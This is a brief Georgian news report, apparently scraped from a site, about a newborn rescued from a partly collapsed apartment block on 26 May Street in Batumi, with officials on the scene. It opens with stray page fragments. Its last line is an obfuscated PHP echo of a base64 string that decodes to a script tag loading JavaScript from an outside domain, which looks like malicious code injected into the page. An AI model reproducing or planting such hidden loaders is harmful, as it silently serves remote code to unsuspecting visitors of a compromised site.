celsiusi
ავერსი შნაიდერი
ბათუმში, მაშველებმა ჩამონგრეული კორპუსიდან კიდევ ერთი ბავშვი - ახალშობილი გამოიყვანეს. ბავშვი ამ დროისთვის კლინიკაშია გადაყვანილი.
 
ამ დროისთვის გრძელდება ნანგრევებში მოყოლილი პირების სამძებრო სამუშაოები. პარალელურად სამაშველო ბრიგადები შენობის დანარჩენი ნაწილიდან მოქალაქეების ევაკუკაციასაც ახორციელებენ.
 
ადგილზე მივიდა აჭარის მთავრობის თავმჯდომარე თორნიკე რიჟვაძე. ის ადგილზე შექმნილ სიტუაციას პირადად ეცნობა.
 
ცნობისთვის, ბათუმში, 26 მაისის ქუჩაზე 5-სართულიანი კორპუსის ერთი სადარბაზო ცოტა ხნის წინ ჩამოინგრა. ადგილზე მობილიზებულია სამაშველო და სასწრაფო დახმარების სამსახურები.
 
სამართალდამცავებმა ტერიტორია სპეციალური ლენტით შემოსაზღვრეს.
960
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");